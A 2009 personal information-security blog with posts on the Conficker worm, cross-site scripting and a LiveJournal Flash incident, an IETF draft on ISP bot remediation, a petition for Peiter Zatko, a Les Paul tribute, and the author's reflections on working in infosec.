Saturday, September 26, 2009

Go Conficker...

A little less than a year ago, Microsoft announced a critical vulnerability in its Server service. The vulnerability involved specially crafted Remote Procedure Call (RPC) requests, which the Server service would not handle correctly (i.e., drop). The crafter of these requests could use them to execute code of his choice on the server, such as creating or deleting users or changing security policies.

I'd call that a problem. And it wasn't merely potential problem; the exploit for this vulnerability is known world-wide as the Conficker worm, first detected not long after Microsoft's initial security bulletin. Since its inception, Conficker has wreaked havoc on government, business, and home computer systems all over the world, and the investigation to discover its perpetrators is still ongoing.

Our best guess is that the perpetrators are based in the Ukraine, since Variant E of the worm downloads software from a server hosted there. However, they have not yet been fingered, and in the meantime, they continue to control countless infected computers.

Conficker is easy to miss because nothing splashy happens. The most obvious way to tell that you have been infected is that user accounts are locked out or policies have changed, or automatic updates stop running. In the meantime, Conficker has been active on your network or Internet connection, downloading updates for itself and new malware, modifying your registry, establishing restore points, and so on.

There's a Microsoft patch that you can install, and all the major AV companies are able to detach and remove the worm. But despite these facts, Conficker continues to propagate, almost a year after its release, and the perpetrators have still not been found. One of the reasons for this is that Conficker is constantly being updated, and can disable some of the AV solutions before they have a chance to detect and remove it.

There is one very easy way to check to see if you are infected with Conficker: go to this page. If you cannot see all six logos, you may very well have been infected.

Wednesday, September 23, 2009

XSS Is Alive and Well

Not all that long ago, I had an interview where I was asked what cross site scripting was. Now, the thing is, I know very well what it is, and in fact, while I was working for my former employer, I wrote a white paper on the subject that was very widely used by their support and systems engineering personnel.

But have you ever been in the position of knowing something, yet when someone asks you about it, you just go cold? That's what happened to me in the interview. I stammered out a reply that was utterly wrong, and I knew it was utterly wrong, and I've been kicking myself ever since.

In the meantime, on a technical email list, one of my colleagues suggested that cross site scripting -- or XSS -- is no longer that much of an issue (because everyone knows about it and has taken precautions). That position is naive at best, though it's true that XSS is no longer the big deal it was a couple of years ago. However, it's still very much alive and well as a security vulnerability.

One of the problems in understanding XSS, or cross site scripting, is that the term itself is confusing. Originally it meant that a malicious web site could load another web site into a frame or a window, and then use scripting -- usually JavaScript -- to read and/or write data on that site (which is actually close to what I told my interviewer). However, later on, the term changed to mean "code injection" of scripting into a web page.

There are different kinds of XSS vulnerabilities, but the most typical type is where a user is enticed to click on or otherwise activate a URL that includes scripting language. This isn't that hard to do, because often users, especially those who are less technically sophisticated, don't look at where the URL is actually directing them to when they click on it.

Further, and unbeknownst to many users, it's possible to encode an object on a web page with a malicious URL such that just by viewing the page, the user is activating that URL. There's no way for the user to tell what's happened, and the only way to prevent it is to lock down the user's web browser such that it will not execute any scripts it finds on a web page. The problem with this is that locking down the browser to this degree will cause media-rich web sites to malfunction (from the user's point of view). In other words, as has always been the case, security is often sacrificed for ease of use.

XSS vulnerabilities have been exploited since the advent of the World Wide Web, but XSS became a really hot topic in 2005, which is when my former employer asked me to write the white paper about how one of their products addressed the issue. Vulnerability scanning for XSS was all the rage, and web site developers were scrambling to fix their html and scripting such that code injection could no longer work. Gradually, things calmed down to the point where my colleague could declare on a mailing list full of security geeks that it was no longer an issue. Too bad he was wrong.

The other day, one of my friends commented on a LiveJournal™ post I'd made, to the effect that it appeared my post had been hacked. He directed me to a news article on LJ that I'd missed: http://news.livejournal.com/117957.html . You can read the article for yourself, but basically what happened is that someone had managed to infect a Flash™ file with a malicious URL. Anybody who viewed the file would have their latest (at the time) LJ post altered: the infected file would be inserted, any tags or other extra info would be deleted, and (usually) the post's security level (i.e. public/friends only/private, etc.) would be altered.

Sure enough, my post was "infected". My tags and location were removed, a formerly "friends only" post (the default for my journal) was now public, and the infected media had been inserted. However, the site already knew about the problem, and so it had turned off media embedding so that no further users would be affected, and issued a bulletin explaining what had happened, so all I saw were the "boxes" mentioned in the news article, not the infected media. At this point, I have no idea what the media looked like or who I "caught" the infection from, but as it's been contained and fixed (and my post is now "friends only" again), I'm only mildly curious.

The LiveJournal™ problem was caught and mitigated quickly, and while certainly there was a breach of privacy (secure entries becoming public, email addresses being mined), the effects were relatively minor. But it should be pretty obvious that XSS is far from "no longer an issue", given what happened.

Thursday, September 17, 2009

this just in

So, in case you're not aware of it, there's an online petition to appoint Peiter Zatko to the President's Post of Cybersecurity Chief (also known as the Cybersecurity Czar). As soon as I heard of the petition, I clicked through to sign it, even though I'm not sure what, if any, effect the petition will have on Mr. Obama's decision. The fact of the matter is that I admire Mr. Zatko so much that I couldn't fail to sign it.

Mr. Zatko, who is currently 38 years old, has been a researcher in the field of network security for as long as the field has been extant. In 1995, he published the seminal white paper on the buffer overflow attack, "How to Write Buffer Overflows", which remains an important tutorial on the topic today for hackers of all varieties. Choosing to use his abilities to help rather than harm the government, he was one of several hackers to testify on security weaknesses before a Senate committee in 1998. Two years later, he met with then-President Clinton at a summit on network security. Currently, he is a division scientist at BBN, who knows a good thing when they see it (they wooed him back again after losing him in the '90's to @stake, which was essentially the L0pht gone corporate).

I believe that Mr. Zatko could ably perform the position of Cybersecurity Czar; in fact, he is uniquely suited to this position simply because of his background in grey hat hacking. My feeling is that if Mr. Obama is serious about network security, he will appoint Mr. Zatko or someone very much like him to this very important post.

Go for it, Mudge!

Wednesday, September 16, 2009

IETF Publishes a Draft on Remediating Bots in ISP Networks

The Internet Engineering Task Force just published a draft on how ISPs can help to remediate bots on users' systems or home networks. Having read the draft, I do have a couple of thoughts on it, which I will present after a quick synthesis of the draft.

Synthesis of Draft


In short, the draft covers the following subjects:
  • Maintaining privacy of the user

  • Non-interference with legitimate traffic

  • Recommendation for types of tools

  • Challenge of "definitive vs. likely" in informing user

  • Dealing with user complaints

  • Sharing of bot information with other ISPs

  • Use of Honeynets

  • Informing users:

    • Email

    • Telephone

    • Postal Mail

    • "Walled Garden"

    • IM

    • SMS

    • Web browser message

  • Remediation

  • Guided Remediation


So for me this actually brings up a couple of questions. First of all, who's responsible for a bot on the network? And second, what is actually going to work in a situation like this?

Responsibility


If there is a bot -- or really, any malicious piece of code -- on a user's personal system, who is responsible for discovering and/or remediating it? Unfortunately, it's not obvious. The user, obviously, owns all of his computers and networking equipment, up to and in some cases including the DSL or cable modem. That said, the ISP owns the actual connectivity. The ISP also will also get the black eye if malicious packets are coming through its networks, for example, if computers on the ISP's networks are used in DDoS attacks. The hope is that the ISP would have found and remediated the malicious code before that happens, but how far can (and should) the ISP go in the attempt to do so?

What Actually Works


The draft, in discussing options for informing users, talks about a "walled garden". What a "walled garden" does is place the user's account in some degree of isolation from the rest of the network, cutting off access to some or all services. The presumption is that the user will notice that his access is cut off and will contact the ISP, initiating a dialog that can lead to remediation. The draft mentions that the walled garden can persist until the problem is remediated, or it can be lifted as soon as the user has been informed of the malicious code.

In my opinion, the walled garden should actually serve the following multiple purposes:

  • Inform the user of a potential bot or malware based on the ISP's scanning (etc.) activity;

  • Remain as a safety net while the ISP and the user dialog about further malware scanning and remediation, and begin that process;

  • If the malware is found to actually exist, remain as a continued safety net until everything has been done, by both the ISP and the user, to remediate the situation.

In other words, keep the user's account isolated to at least some degree until the problem is fixed. Obviously, this is not going to be something that users will necessarily like, especially if they don't understand what's going on. And here is where I think ISPs need to take more responsibility, from the start, when user first sign up for Internet service.

In general, ISPs sign users up for Internet service, and then they just let them go. For users like myself, who know what they're doing on a network, and just want to be left alone, this is a pretty good option. But any user can become the victim of malicious code, no matter how sophisticated they are, and I think that ISPs are letting users down when they don't try to educate them about malware and what it can do. Just providing users with a CD of "connection" software, which may or may not contain AV and antispyware tools at a minimum, is not enough to fulfill an ISP's responsibility to keep bots and malware from reinfecting the Internet from its users' machines.

That's why I think the extended walled garden approach is necessary, combined with the ISP stepping in and helping the user confirm the presence of the malware and then help them remove it. But I also think that the ISP has to take more responsibility up front, to help the user understand what malware is, what it can do, and what to do to mitigate possible threats. In other words, I like the draft as far as it goes, but I think that it doesn't go far enough.

Friday, August 14, 2009

how high the moon

This isn't really about security, but it is about technology.

As we all know, Les Paul died yesterday. When I heard the news, I wasn't surprised -- he was pretty old -- but I was definitely sad. Les Paul's guitars and his wife Mary Ford's voice were a huge part of my early childhood. As a child who loved to sing, I was very interested in the multiple vocal tracks; naturally I thought it was several women singing. My parents explained the concept of multi-tracking and I became quite fascinated. It wasn't until recently that I had the ability to do more than double-tracking, but I still experiment with vocalizing and multitracking now and then. Later on, I learned a lot more about Les Paul's work with Gibson and came to worship the Les Paul style of guitar for the incredible instrument it is. I no longer own a Les Paul guitar myself, but at some point I may invest in one again (the one I had was the less expensive Epiphone™ model).

I could go on in depth about how multitracking works, but I wouldn't be able to describe it as well as Les and Mary themselves, as they joked with Alistair Cooke on Omnibus, shown in this clip:



RIP, Les. You're missed.

Thursday, August 13, 2009

what's the point?

I was asked some philosophical questions today in an interview, about what the point is of Information Security, and why I do that instead of something else. The questions were general enough that I don't feel it's unethical to talk about them here, so I'm going to expound on them a bit.

First of all, why am I in Infosec? I sort of "fell into" the profession, unlike a lot of people who have perhaps more technical backgrounds. It's not that I don't have a technical background at all -- I knew how to spell TCP/IP before I got into Infosec -- but most of what I know about networking and systems was learned on the job, not something I knew before I started. There will probably always be gaps in my knowledge because of this, and it can be pretty frustrating to be confronted with those gaps.

But on the other hand, one of the things I love about Infosec is that NOBODY knows everything. There is always more to know. There are people who are looked up to, but the true Information Security professional never feels that it's possible to be an expert. There is no one tried and true way to effect security; there is theory and there is practice and there is hard work. There is guessing, and hunches, and aha! moments. There is the triumph when you have defeated a problem, and there is the sick, sweaty panicky feeling when you know that there is a problem but not exactly what it is or how to fix it.

And that is what I love about Infosec, and why I do it. It's a sea of chaos out of which I can do my best to make some order. It is a never-ending source from which I can drink knowledge. It's the frontier, and I love to explore it, even if I occasionally get eaten by a tiger.

And that's the thing; we are in fact going to be eaten by tigers. Because the only truly effective way to secure a system is to disallow it from BEING a system -- to cut off all access to it -- there can never be any assumption of security. There will be breaches and leaks. However, that knowledge is no reason to stop trying to secure systems and networks. I lock my car doors when I walk away, even though I know that a determined thief can break in. I want to make it hard for him to break in, and once he does, I want to make it very difficult for him to get away with my goods. It's a battle that I may not always win, but if there is a point to doing business at all, there is a reason to try to secure the means of doing that business. And after you have done everything you can think of to secure the systems and network, you never assume you have succeeded; you continue to check, you monitor, you look for the little things, you keep on pushing, because the tigers are hungry.

There are other things I like to do. In fact, I probably spend too much time doing some of them. But over and over, Information Security engages my passion, and seems to me to be something worth doing. And that is why I do it.

Wednesday, August 12, 2009

black what now?

Not all that long ago, I joined a mailing list called WISE, which stands for Women In Science and Engineering. Once I'd joined it, I wondered what had taken me so long. Subsequently, one of the other members -- the same one who had invited me to the list -- talked about her professional blog, and I began wondering again. This time I wondered why I, an Infosec professional for over a decade and a prolific writer, didn't have a professional blog.

The answer to that question is simple but sad: I didn't realize, until fairly recently, that I had something to say. As a woman in Infosec -- there are still so very few of us -- I am something of a dancing bear, and I have been admonished to "shut up" by my male colleagues fairly often. Looking around, I am not seeing other female Infosec professionals with blogs or who contribute to the "official" blogs in the industry.

I'm not interested in bringing feminism to Information Security. Rather, knowing that I am good at what I do, I am interested merely in being heard. I am not so different from my male colleagues. I think that I do, in fact, have something to say.

So why Black Cats and Smoke and Mirrors? Well, first of all, I'm a nerd, and nerds love puns. Many IT professionals don't really understand Infosec, so I'm making fun of that. In addition, though most of us don't exactly brag about it, there's a little "black cat" in every white hat; in order to figure out how to protect systems, we have to know how to break or break into them. While obfuscation isn't the best or only way to protect, smoke and mirrors does play a part in securing systems and assets.

Although currently I'm between positions (and doing research in forensics on my downtime), I'm constantly thinking about and reading about Infosec. I think it's time I took all that thinking and reading and wrote about it, too. I hope that you'll agree that I have something to say.